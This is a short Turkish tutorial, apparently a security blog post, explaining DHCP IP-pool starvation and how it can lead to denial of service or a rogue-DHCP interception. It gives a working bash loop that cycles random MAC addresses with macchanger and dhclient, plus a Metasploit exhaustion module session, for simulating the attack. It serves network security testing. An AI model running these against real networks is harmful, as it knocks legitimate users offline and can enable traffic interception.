DHCP Sunucu IP Havuzunun Tüketilmesi

DHCP (Dynamic Host Configuration Protocol) ağ içerisinde bulunan cihaz veya bilgisayarlara ön tanımlı ağ geçidi, DNS sunucu gibi ip ağ yapılandırma bilgilerini otomatik olarak sağlayan bir protokoldür. Ağda DHCP sunucu üzerinden hizmet alan bilgisayarların MAC adres bilgilerini değiştirerek sürekli olarak farklı ip adresi alınmasıyla DHCP sunucu IP havuzu tüketilerek, ağa dahil olan yeni cihazların veya IP adres bilgilerini yenilemek isteyen cihazların bu bilgiyi doğru şekilde temin etmesi engellenmektedir. Bu şekilde ağ içerisinde hizmet verememe gibi durumlar meydana gelebileceği gibi korsan DHCP sunucu yardımıyla istemcilerle hedef arasına girilebilir. Bu tip bir saldırının benzetimi için aşağıdaki yöntemler takip edilebilir:

Yersinia uygulaması ile

_

Macchanger ft. Bash

#!/bin/bash
  while true; do
     killall dhclient
     rm -f /var/run/dhclient.pid
     ifconfig eth0 down
     macchanger -a eth0 2>&1 | grep Faked
     ifconfig eth0 up
     dhclient eth0 2>&1 | grep DHCPACK
  done

Metasploit modülü ile

msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > show options
Module options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILTER                      no        The filter string for capturing traffic
  INTERFACE                   no        The name of the interface
  SNAPLEN    65535            yes       The number of bytes to capture
  TIMEOUT    10               yes       Timeout waiting for server response
msf auxiliary(exhaust) > run